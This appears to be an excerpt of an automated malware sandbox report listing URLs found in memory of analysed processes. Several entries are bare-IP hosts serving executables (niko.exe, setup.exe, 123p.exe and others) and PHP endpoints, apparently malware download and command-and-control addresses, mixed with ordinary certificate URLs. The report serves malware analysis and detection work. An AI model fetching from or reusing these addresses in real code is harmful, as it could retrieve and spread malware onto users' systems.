Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe:t
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exe;
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeP
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeU
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeings
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exeom/D
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.149:54674/vape/niko.exez
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451806500.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418845249.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/pelikan
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.109/pelikanK
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.phpV
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.php_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.phpaw
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.159/dl.phpx
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe$n
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe)
Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exet-
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.172.18
Source: explorer.exe, 00000024.00000003.2275944266.0000000011531000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://45.129.96.86:80/file/update.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.0b
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451806500.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418845249.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/123p.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/123p.exeitdq
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage15.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage15.phpP=ce
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/getimage15.phps/Iy
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phphp
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phppuLp$
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/retail.phpt_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/space.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.10/download/th/space.phpLt
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47/files/setup.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47/files/setup.exe$n
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.66.47/files/setup.exe-
Source: explorer.exe, 00000024.00000003.2272271492.000000000C721000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.2273666539.000000000C721000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://66.85.156.89/
Source: explorer.exe, 00000024.00000003.2274886425.000000000C1E9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://66.85.156.89/nafdhkdf.exe
Source: explorer.exe, 00000024.00000003.2274608551.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://66.85.156.89:80/nafdhkdf.exec#
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/api/bing_release.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/api/flash.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26/api/flash.phpb
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.192.56.26:80/api/bing_release.php
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exeyy
Source: svchost.exe, 00000034.00000003.1879020680.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2019585749.000001F4D993C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3EM.C552_BAY
Source: svchost.exe, 00000034.00000003.1408056541.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS</ds:KeyName></ds:Key
Source: svchost.exe, 00000034.00000002.2798278482.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1553593331.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS</ds:KeyName>&ltX
Source: svchost.exe, 00000034.00000003.2366828259.000001F4D9937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd
Source: svchost.exe, 00000034.00000003.1960391374.000001F4D8679000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000034.00000003.1503483215.000001F4D8F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbA
Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_com
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a-dira.net
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://channel.360totalsecurity.com/ins?m2=%s&v611=%s&ch=%s&sch=%s%s?%skeyref_linkPhttps://orion.ts.
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: lgX7lgUL1w.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000034.00000002.2789612356.000001F4D86DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
